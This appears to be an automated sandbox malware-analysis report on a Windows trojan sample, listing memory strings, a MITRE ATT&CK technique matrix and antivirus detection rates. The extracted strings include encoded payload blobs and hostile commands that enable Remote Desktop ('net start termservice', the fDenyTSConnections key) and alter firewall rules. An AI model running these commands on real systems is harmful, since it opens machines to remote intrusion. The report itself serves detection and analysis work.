Source: EC2F.tmp.gfx.exe, 00000012.00000002.2331733029.00000000006E1000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
Source: Gxtuum.exe	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000013.00000002.2333216906.00000000007F1000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000013.00000002.2333216906.00000000007F1000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
Source: Gxtuum.exe, 00000013.00000000.2330753318.00000000007F1000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000013.00000000.2330753318.00000000007F1000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
Source: Gxtuum.exe	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000014.00000002.3378619283.00000000007F1000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000014.00000002.3378619283.00000000007F1000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
Source: Gxtuum.exe, 00000014.00000000.2349088893.00000000007F1000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000014.00000000.2349088893.00000000007F1000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	1 Remote Desktop Protocol	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	13 Native API	1 Scheduled Task/Job	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 Credential API Hooking	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 Abuse Elevation Control Mechanism	1 Credentials in Registry	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Exploitation for Client Execution	Login Hook	1012 Process Injection	2 Obfuscated Files or Information	1 Credentials In Files	138 System Information Discovery	Distributed Component Object Model	1 Credential API Hooking	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 Command and Scripting Interpreter	Network Logon Script	1 Scheduled Task/Job	1 Timestomp	LSA Secrets	681 Security Software Discovery	SSH	3 Clipboard Data	122 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	1 Scheduled Task/Job	RC Scripts	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Cached Domain Credentials	351 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Rootkit	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Masquerading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	351 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1012 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Hidden Files and Directories	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1 Rundll32	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
yINR7uQlPr.exe	40%	Virustotal		Browse
yINR7uQlPr.exe	75%	ReversingLabs	Win64.Trojan.Midie
